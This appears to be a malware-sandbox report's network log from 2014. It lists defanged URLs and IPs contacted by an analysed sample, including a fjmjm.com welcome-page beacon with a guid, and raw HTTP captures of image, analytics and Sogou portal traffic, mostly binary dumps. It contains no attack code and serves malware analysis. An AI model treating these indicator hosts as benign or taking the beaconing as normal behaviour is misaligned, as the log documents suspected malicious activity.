hxxp://s9.cnzz.com/stat.php?id=5645354	1.99.192.15
hxxp://www.fjmjm.com/web/images/guide_top.jpg	61.147.92.99
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=1755494700	42.120.219.171
hxxp://www.mdtxw.org/miniindex/images/aaa5.jpg	112.124.102.171
hxxp://stat.fjmjm.com/a/cpv1.html?t=20140601113322
hxxp://d.123.sogoucdn.com/v53/imgn/v53_2icos.gif	222.211.87.167
hxxp://123.sogou.com/v53/get_tj.php?hz=4671920&ids=qiche	220.181.124.3
hxxp://123.sogou.com//v53/get_123_v53.php?block=wt&ver=v53&gfg=1&city=unknown&pid=Af22014&c=1401576016336&method=ajaf&cbf=fn	220.181.124.3
hxxp://www.mdtxw.org/miniindex/images/aaa6.jpg	112.124.102.171
hxxp://123.sogou.com/images/weather/cloudy.gif	220.181.124.3
hxxp://hzs10.cnzz.com/stat.htm?id=5645354&r=http://www.mdtxw.org/miniindex/&lg=en-us&ntime=1401593629&repeatip=3&rtime=0&cnzz_eid=1321967991-1401593629-&showp=1024x768&st=-17582&sin=none&t=undefinedundefinedundefined&rnd=1579681700	42.156.140.25
hxxp://www.mdtxw.org/miniindex/images/aaa9.jpg	112.124.102.171
hxxp://p6.123.sogoucdn.com/imgu/2013/08/20130820165531_481.gif	114.80.179.210
hxxp://p0.123.sogoucdn.com/u/js/ufo2.js	222.211.87.167
hxxp://www.mdtxw.org/miniindex/images/b15.jpg	112.124.102.171
hxxp://cnzz.mmstat.com/9.gif?abc=1&rnd=1384439699	42.120.219.171
hxxp://www.mdtxw.org/miniindex/images/b17.jpg	112.124.102.171
hxxp://123.sogou.com/v53/jsn/v53_123n.js?V=11	220.181.124.3
hxxp://www.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a14f7d081b4cb2059dd4e9cb28c131c461f1ccc2f88a430cb454a18b9b824a0f1401576007&lastver=	61.147.92.99
hxxp://p3.123.sogoucdn.com/imgn/v32/setskinbg.gif	58.215.147.40
hxxp://www.mdtxw.org/miniindex/images/b18.JPG	112.124.102.171
hxxp://www.mdtxw.org/miniindex/images/aaa10.jpg	112.124.102.171
hxxp://www.mdtxw.org/miniindex/images/aaa3.jpg	112.124.102.171
hxxp://pcookie.cnzz.com/app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3	42.120.219.171
hxxp://pb.sogou.com/pv.gif?uigs_productid=ufo&ufoid=wan&ptype=jztf2&pcode=index&rdk=1401576015993&img=pv.gif&sourcelist=0011000100006_0011000100007_0011000100008_0011000100009_0011000100010_0011000100011&titlelist=çƒè¡€æ²™åŸŽ_é£Žäº‘æ— åŒ_ä»™ä¾ é“_å¤§é—¹å¤©å®«OL_ä¸‡ä¸–_Sogouå‚²å‰‘2	220.181.124.110
hxxp://www.fjmjm.com/favicon.ico	61.147.92.99

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /miniindex/images/aaa4.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 61094

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:58 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:05:17....................
.................................................................&.(..
...............................R.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................x...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?.....[....i.r.H.e.4.T...-.96l6i[.%.
#..j.../Q.-~;Hc......O.}....o....u<lL.G.)m........s.9.......8tV.9..
..8..V........N.Y...L.V...&.M.y.Yz..C*....c.. ...j?..j.Y...M.{6-n..;..
.LF.b....*.C.kl}}..]>.U.h.-..............j...cq..0....e..Cmo..-w..[
N..Vi...pX.....-k....=-.]mk>...I2D..i......._......z....5.6....\v..
 \.?7.s...de.mU..p..'..\._X..1............ZX.......M.....$.cZ.........
.FW....k....S.1..f^.c......q......I...^.zN...b... ~~Q#Su..qT........=.
..".G.....h1.......;)4..[lk.....A.....ad.\..e.`'..-..9z^mmu..4'.......
.p.{...?M..5..h..'.j.[80.....FwF.K..8.p~I}....R.SI.S0]&...V.)}...=....
..$..C..x)......&...PTA" .W......K..B/...V,.........3*...kC...i#..<<< skipped >>>

GET /miniindex/images/aaa7.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 24446

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:34:01 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:21:08....................
.........}...........~...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................~.}.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?.......\.......'..r~....N.....F...:
.......e..P4.....z6.tuf...c,n.j.N....Q.=..;<.'...X.....:.'A....:W@.
.0]s..V....G.......P.O.`|...2.ve..Ya;...a#-5)[email protected].. .......O.h.n
....i;M..s... c].....gfSsG.]#.5..|.K.a.X..!.c.:.O.....&.....~v....}i..
..r.}.u.>f..7m../.......\.r..II$..RS9 .*.'.M.g.J..S...J.Gu.32.I)...
.u<..k-;[.]...]o...9C9.Yok1\.q&...Z.....&...d ...r~..A.V.....K...%y
g....}1.... .}......~.......V...\KY..<.T9"j...ZOceX..h...@#.<..O
..j.syQ.F&.$.......&.K] ....W=.>.tN./..b.#[i..|l.......h....:L...W.
f}Y..X..2$:?;.aK....9. w..........O........]..1^....u.{3.l..z.....{...
v..kY;~.......4Y.cZ..:...X...........x"..i>.,p..6.`.O.c........<<< skipped >>>

GET /miniindex/images/aaa9.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 23028

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:34:02 GMT
......JFIF.....`.`.....DExif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:26:02....................
.........}...........~...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................~.}.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?...m/.'....s.........5n....?.T<x
...S [email protected].]..~.UC [email protected].\.)k..$..?....uln...
.}........N...v..(.. .%Oc.Ki............1.KA\.B.wQ..9.m.m .!....#s.|..
...G..3..o.........8}..c}m. v?P......A.H......PDvY.S.......t...M$v.LA.
.O3..0...c..6K.......u.P....v...>......[....X...lct..5....U.4..!..z
....z.....o.p..u<....u`4i. y=q...c.TX.....qY...}.,p,..p..J~(HkWi...
u....y..N....)p....^..._Q.fM\Z. vt/%.....H8...l.......Wv>G.lt2..N..
....'e..5kO....O..6..2[..d\....o...k..G...... ..A~...^..X.)s.Hm.p-=.n.
............{L.q..........t..r5...........b......i.y*A..(.%..xR.ap....
[email protected](L..p;........a..........gHu}...>>.....ZX.$...<<< skipped >>>

GET /app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: pcookie.cnzz.com


HTTP/1.1 200 OK

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:52 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3; expires=Wed, 29-May-24 03:33:52 GMT; path=/; domain=.cnzz.com

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;....

GET /app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: pcookie.cnzz.com

Connection: Keep-Alive

Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3


HTTP/1.1 200 OK

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:56 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3; expires=Wed, 29-May-24 03:33:56 GMT; path=/; domain=.cnzz.com

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;....

GET /app.gif?&cna=H40RDLEq1ksCAbhrJiZN4/ 3 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: pcookie.cnzz.com

Connection: Keep-Alive

Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3


HTTP/1.1 200 OK

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:59 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=H40RDLEq1ksCAbhrJiZN4/ 3; expires=Wed, 29-May-24 03:33:59 GMT; path=/; domain=.cnzz.com

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

GIF89a.............!.......,...........L..;..

GET /imgn/v32/selogo_111207.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p1.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: image/png

Content-Length: 12155

Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:25 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
.PNG........IHDR...a...?.....V.......pHYs................OiCCPPhotosho
p ICC profile..x..SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE.........
..Q,......!.........{.k........>...........H3Q5...B..........@..$p.
...d!s.#...~<< ".....x.....M..0.....B.\[email protected]..@F....
&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH..
...........0Q..)..{.`.##x.....F.W<. ...*..x..<.$9E.[.-q.WW..(.I.
 [email protected]..._-...."[email protected]~..,/...;.
.m..%..h^[email protected].~<<E.........J.B[a.W}.g._.W.l.~<..
....$.2].G......L......b...G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..&
gt;.5..j>.{.-.]c..K'.Xt.......o..(...h...w..?.G.%..fI.q..^D$.T..?..
..D..*.A....,.........`6.B$..B.B.d..r`)..B(....*`/[email protected]..=p..
a...(....A...a!...b.X#......!.H...$ ...Q"K.5H1R.T UH..=r.9.\F..;..2...
.G1...Q=...C..7..F...dt1......r..=.6....h...>C.0....3.l0...B.8,..c.
."......V.....c..w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.X
H,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,  .......3...!.[.
[email protected].(R.jJ....4..e.2AU..R...T.5.ZB...R.Q...4u.9...IK......h.h.i..t.
....N..W...G.....w.......g(.....g.w...L......T071......oUX*.*|.....J.&
..*/T.......U.U.T..^S}.FU3S......U..P.S.Sg.;...g.oT?.~Y...Y.L.OC.Q.._.
.. .c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).).
.4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.
n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC][email protected]....
..<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......<<< skipped >>>

GET /imgu/2014/05/20140528121909_796.jpg HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p1.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/jpeg

Content-Length: 6439

Last-Modified: Wed, 28 May 2014 04:19:09 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
......JFIF.....d.d......Ducky.......T......Adobe.d....................
......................................................................
.......................................................k._............
......................................................................
...........!.1A.Qa"..q.#....2...BR.$..br....3..TE.....................
..!A..1Qa.q.......".BR..2#...............?...J...Q....^.u!P...5.......
l{.DN..............d..-$..P....P..f..4..'M..z5#........\.m..NR........
...G...e.=.vfP.. .Eo..np...%!h.j...|).}..N.I...,.8..e]Cv..w.[6....O../
X.jN%......2.{..r.-.."..:.7.4.:...!%.4..h.:...~...x..lA...[..o...q.v\.
.~...s./.qf}~S_.r.......L..JivB~..?Oo....v..N.....D../..Z.F\:g..#.D.n?
m.q...E..q...h..1...j.ya..W..UI.$ ..I..v...u...{.V;~...C..."}<WE8..
l...D....:..,../.. ....R.T...go,..S...'..H.t..\x.v .]e._M~..^.4..$.A.t
hB..%.1..$..IS.'..S....5..Q`.5...M../.............XiT3.ds .).........Y
O2...].....c..fa.I.....DiE.......M(I....{.x.hS.....,G.......l......K..
......)j.......-..n0.$...mI yPt......;9.....C.JB$.>9.Q}i....|9.w[..
e.2...dY<x.4?0m..M..6:....&.xUj.Y..n....b.|...M.....|.TQ........E.3
...S..7H.................P*.5...<.......ZZ.|..Z.r2..aI>..7._....
....!.|.V...U....P.PR..;MzTP..g.Z....Y\R..-L......i.4.l.$.$.0|... . ..
.....%]....sHB...n...SO..k.B~.0..o...i.;gU..g..z;.4.1......l.R.~..C.u.
.ZiH.S.......]...........u.....%uq)>....n"...}...*..x.............s
..q>...>..E......}/...wu2.y-...em...B.*...^..l..4.8.....8.E..yN.
.N.......E..%....%...KL.|..I.%..<...m..-..YJ..$D..xrR...u..3..2<<< skipped >>>

GET /imgu/2013/08/20130830161205_609.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p5.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/gif

Content-Length: 13241

Last-Modified: Fri, 30 Aug 2013 08:12:05 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
GIF89a........;\.%...1..... ........ .................................
.......................................!..XMP DataXMP<?xpacket begi
n="..." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adob
e:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46.272976, Sat Jan 27 200
7 22:37:37        ">.   <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/19
99/02/22-rdf-syntax-ns#">.      <rdf:Description rdf:about="".  
          xmlns:xap="hXXp://ns.adobe.com/xap/1.0/">.         <xa
p:CreatorTool>Adobe Fireworks CS3</xap:CreatorTool>.         
<xap:CreateDate>2007-01-04T22:10:31Z</xap:CreateDate>.    
     <xap:ModifyDate>2013-08-30T08:11:54Z</xap:ModifyDate>
.      </rdf:Description>.      <rdf:Description rdf:about=""
.            xmlns:dc="hXXp://purl.org/dc/elements/1.1/">.         
<dc:format>image/gif</dc:format>.      </rdf:Descriptio
n>.   </rdf:RDF>.</x:xmpmeta>.                         
                                                                      
     .                                                                
                                    .                                 
                                                                   .  
                                                                      
                            .                                         
                                                           .          
                                                                  <<< skipped >>>

GET /stat.php?id=5645354 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s9.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Date: Sun, 01 Jun 2014 03:33:49 GMT

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Sun, 01 Jun 2014 03:33:49 GMT

Expires: Sun, 01 Jun 2014 05:03:49 GMT
2595..(function(){function l(){this.c="5645354";this.R="z";this.N="";t
his.K="";this.M="";this.o="1401593629";this.P="hzs10.cnzz.com";this.L=
"";this.s="CNZZDATA" this.c;this.r="_CNZZDbridge_" this.c;this.G="_cnz
z_CV" this.c;this.u="0";this.B={};this.a={};this.la()}function g(a,b){
try{var c=[];c.push("siteid=5645354");.c.push("name=" d(a.name));c.pus
h("msg=" d(a.message));c.push("r=" d(h.referrer));c.push("page=" d(f.l
ocation.href));c.push("agent=" d(f.navigator.userAgent));c.push("ex=" 
d(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).
src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(e){}}var h=docu
ment,f=window,d=encodeURIComponent,k=decodeURIComponent,p=unescape,r=e
scape,m="https:"===f.location.protocol?"https:":"http:",s=m "//c.cnzz.
com/core.php";l.prototype={la:function(){try{this.U(),.this.J(),this.i
a(),this.H(),this.m(),this.ga(),this.fa(),this.ja(),this.j(),this.ea()
,this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),f[this.r]
=f[this.r]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:funct
ion(){try{var a=this;f._czc={push:function(){return a.C.apply(a,argume
nts)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=f._czc;if("
[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b  ){v
ar c=a[b];switch(c[0]){case "_setAccount":f._cz_account="[object Strin
g]"===.{}.toString.call(c[1])?c[1]:String(c[1]);break;case "_setAutoPa
geview":"boolean"===typeof c[1]&&(f._cz_autoPageview=c[1])}}}catch(e){
g(e,"cS failed")}},qa:function(){try{if("undefined"===typeof f._cz<<< skipped >>>

GET /?22014 HTTP/1.1

Accept: */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: 123.sogou.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:20 GMT

Content-Type: text/html; charset=gbk

Transfer-Encoding: chunked

Connection: keep-alive

P3P: CP="NON DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa HISa TELa OTPa OUR UNRa IND UNI COM NAV INT DEM CNT PRELOC"
1f380..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//E
N" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><ht
ml><head><title>........................,........,....1
23.sogou.com</title><meta http-equiv="X-UA-Compatible" conten
t="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="tex
t/html;charset=gbk"><meta name="keywords" content="123,123.sogou
,........,........,........,........,....,....,....,....,....,....,...
.....,........BLOG,....,........,....,........" /><meta name="de
scription" content="123.sogou.com.....................................
......................................................................
......................................." /><link rel="icon" href
="/images/favicon.ico" mce_href="/images/favicon.ico" type="image/x-ic
on"><script type='text/javascript'>var stt={"t1":new Date().g
etTime()};window.v54=0;</script><!--[if IE 6]><script t
ype="text/javascript" src="hXXp://d.123.sogoucdn.com/kan/static/css/DD
_belatedPNG_0.0.8a-min.js?t="></script><script type="text/
javascript">DD_belatedPNG.fix('div.guide_tip_bg');DD_belatedPNG.fix
('i.vplb');DD_belatedPNG.fix('i.vf-pbtn');DD_belatedPNG.fix('i.vf-rank
');DD_belatedPNG.fix('.vfimg i');DD_belatedPNG.fix('i.vf-pbtn');</s
cript><![endif]--><style type="text/css">body,a,ul,li,d
iv,span,h1,h2,h3,p,img,form,input,select,option,i,dt,dl,dd,em{margin:0
px;padding:0px}a img{border:none}a{color:#3f3f3f;text-decoration:n<<< skipped >>>

GET /css/skin_.css?V=dr HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: 123.sogou.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:24 GMT

Content-Type: text/css

Content-Length: 21

Connection: keep-alive

Last-Modified: Tue, 20 Sep 2011 09:23:43 GMT

ETag: "4e785b9f-15"

Expires: Tue, 03 Jun 2014 08:58:13 GMT

Cache-Control: max-age=259200

Accept-Ranges: bytes

/* skin default */.......

GET /v53/jsn/v53_123n.js?V=11 HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: 123.sogou.com

Connection: Keep-Alive

Cookie: ipt=0


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:25 GMT

Content-Type: application/x-javascript; charset=gbk

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Thu, 29 May 2014 10:53:58 GMT

Expires: Tue, 03 Jun 2014 01:22:20 GMT

Cache-Control: max-age=259200

Content-Encoding: gzip
5240..............y.[.u/.U.....O.1.D.MQR.w%K...V^...p..6p...t.......x.
...vd'.D.....DR.)...%..%rr....N......vU..@.....{Kb.N...vU...k.]......7
....^:..U...]m..........k.=Z.;.......|..T.;.u....^s.....zo.T.......Q..
.|v.....<~...]..wO<ne..f...Og.FN0.ys.z.w............_=s.._......
.#...k...........]..v.f.t".............uAV....puqq.t.H.6....]......e..
Ck....t3L.v..M..`.....fg....5....=.........n9#.....6].......;Nu!...vz.
 K]...P..5...a......N..A......;4M...#.....[.Lv...oo..L0.U.....*...-...
...o#.Q.f.v.D[V.Xlv..}q..Q.;.G.....2X.g.9.../...m.k.......e....:ZW...?
.Y..zx.............w.:...j..Y.-.5....|..#.......%..k....,Vr.;..;..\.c.
.....k..F.1l..`T...1..._.:..Y3.4....H....]....9..mqdA...AOL,......].n.
.......K2.L.l.[........=.,.R.Aw<.T.R...`.d...A..Y....R..bf....[..Y.
Q;g..f4.?U.`....E...H.; =.l..Cw.=k.4......HC...$.>...,.8...M......x
.|.e[='X..t.a....m.N.F30...K..rneE..wL|9.\.......R!..\w...|..j/5..J!I=
w...`rR..8-7.6..Y.!..9..ngQ.......4............*.8.Fzl.......j.o...}..
...zN..f.d.(.IZ4kg...i.l ...F|...>.F7..4.o;....).......p4.b.2]..,9.
:[email protected].$&..\ 3....5.^....p6~6..8E...nvA.G..$......)C...!...
B=.b..O......K5EF0jm..d....G.....Acs.....-.....d.".ApJ...Bn....Y...K..
.o-...f.....K..r....h%...z....2 ..Y.V.5..:s.....l^....#.../.oH.^{....(
......Xu|b..Wf. !.H.....O5 ...3j.F._...h...a.T.7'p..N}F.....6.J....F..
.........z..[..(^u9O.y..........Z.e9g..Z9_c..*.g...w..7A7.(...p/...dU.
.c..>~.%;'.... ..3..e..q.w...\ak?.2L...&....k'..5.s..z[.B#....B...6
..T..2...).9s..%..$..`...~.P...8..........hT..N...`N...N...f['..x.<<< skipped >>>

GET //v53/get_123_v53.php?block=wt&ver=v53&gfg=1&city=unknown&pid=Af22014&c=1401576016336&method=ajaf&cbf=fn HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: 123.sogou.com

Connection: Keep-Alive

Cookie: ipt=0; SDUV=1401576016258_7438_00001; CKOR=7763_00001_00000; CKOD=1371_00000_00000; GOTO=Af22014


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: text/javascript; charset=gbk

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: IPLOC=CA; path=/

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

X-Powered-By: PHP/5.1.6

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: max-age=0
e02..sg_wt_cb({"cn":["110100","北京"],"wt7":[["2014-06-01"
,0,"阴有分散性阵雨","cloudy.
gif",19,28,"微风"],["2014-06-02",1,"阴转ࣩ
0;云","cloudy.gif",17,26,"微风"],["2014-06-03",2,"&#
26228;转多云","fine_cloudy.gif",20,30,"微Ƈ
18;"],["2014-06-04",3,"多云转晴","fine_cloudy.
gif",20,31,"微风"],["2014-06-05",4,"晴转ࣩ
0;云","fine_cloudy.gif",22,33,"微风"],["2014-06-06",
5,"阴转多云","cloudy.gif",20,32,"微Ƈ
18;"],["2014-06-07",6,"多云","cloudy.gif",19,28,"微&
#39118;"]],"city":"CN110100","ip":""%local server IP%"","md":"06-01","week":
"0","nongli":"五月初四","tuanmv":"","pm":52});
tjv2_cb({"tj_utag":"00_01_08","data":{"news":[{"tab":"\u5934\u6761","t
aburl":"http:\/\/123.sogou.com\/xinwen\/","list":[{"title":"\u76d8\u70
